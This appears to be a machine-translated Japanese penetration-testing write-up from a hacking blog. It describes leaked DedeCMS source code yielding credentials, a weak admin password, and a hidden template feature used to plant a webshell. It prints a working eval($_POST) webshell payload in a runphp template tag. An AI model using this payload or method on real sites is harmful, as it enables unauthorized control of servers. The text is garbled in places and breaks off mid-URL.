Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863536302

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

0x00はじめに

この浸透のすべての変更が回復し、脆弱性がCNVDプラットフォームに提出されました

0x01ソースコードリーク

暗くて風の強い夜、私はアイドル状態で、インターネットサイトのソースコードをスキャンするためにハンターを使用し始めました。

バックアップファイルスキャンの結果を表示するとき、私は赤ちゃんを見ました

1049983-20220119231005643-855989855.png

一言も言わずに、ダウンロードにアクセスしてソースコードを取得してください!

DEDECMSの痕跡は、注釈情報1049983-20220119231006182-1434081312.pngにあります

0x02敏感な情報漏れ

ソースコードを取得する最初のステップは、もちろんグローバル検索(CRTL+Shift+F)キーワードを試すための機密情報を取得することです

PWD

passwd

パスワード1。データベース情報リーク

1049983-20220119231006736-1457108993.png

2。バックエンド管理者のパスワードが漏れています

1049983-20220119231007158-1967199239.png

MD5復号化は復号化しようとします、それは実際には弱いパスワードです

1049983-20220119231007541-157841701.png

もちろん、アカウントのパスワードを使用した後、バックグラウンド管理アドレスを見つける必要があります。ソースコードのバックグラウンド管理アドレスを持つのは簡単ではありませんか?

バックグラウンドアドレスは、バックグラウンドのRCE-GetShellソースコードで見つかりました(実際には888に変更されました)

1049983-20220119231007991-2064194868.png

漏れたadmin/admin888でバックグラウンドを入力した後、バージョン情報はdecms ps1であることがわかりました

0x03歴史的脆弱性

CMS情報を取得しているので、最初のステップはもちろんその歴史的な抜け穴を見ることです

SP1の履歴脆弱性を見つけることはすべて脆弱性を含むリモートコードですが、このサイトではキーファイルinstall.phpが削除されています(ソースコードには存在しません)

幸運を念頭に置いて、私はそれをもう一度アクセスしようとしました(後でもう一度追加されたかもしれません)それは存在しないので、他の機能ポイントを表示し続けることしかできません

その後、私は多くのSP2の脆弱性をテストしようとしましたが、すべて失敗しました

他のポイントをテストし続けます

システム設定を表示および発見し続けます - システムの基本パラメーター - その他のオプションには、テンプレートエンジンの機能を無効にします

1049983-20220119231008552-615901508.png

しかし、なぜ彼はテンプレートエンジン機能を無効にしたのですか?

この質問でソースコードをもう一度見ました

案の定、テンプレート関連のファイルが再び見つかりました(これは、機能ポイントが非表示であり、ファイルがまだそこにあることを意味します)

1049983-20220119231009182-1712828016.png

アクセス、正常にアクセスし、正常に実行できるようにしてください

1049983-20220119231009831-933380532.png

その後、簡単です。 DEDECMSテンプレートルールに従って、ペイロードする背景テンプレートを書き込み、PHPコードを実行するためのアクセスを記述します。

{dede:field name='source' runphp='yes'}@eval($ _ post ['lyy']); {/dede:field}

//メソッドを呼び出す[field:フィールド名/]ここのキーはrunphp='yes'です

//PHPコードは簡単な文であり、その後、他のオプションのすべての無効な機能を削除して保存します

1049983-20220119231010392-530351846.png

index.htmに注入されるため

したがって、ウェブシェルに接続されたURLはホームページです

http://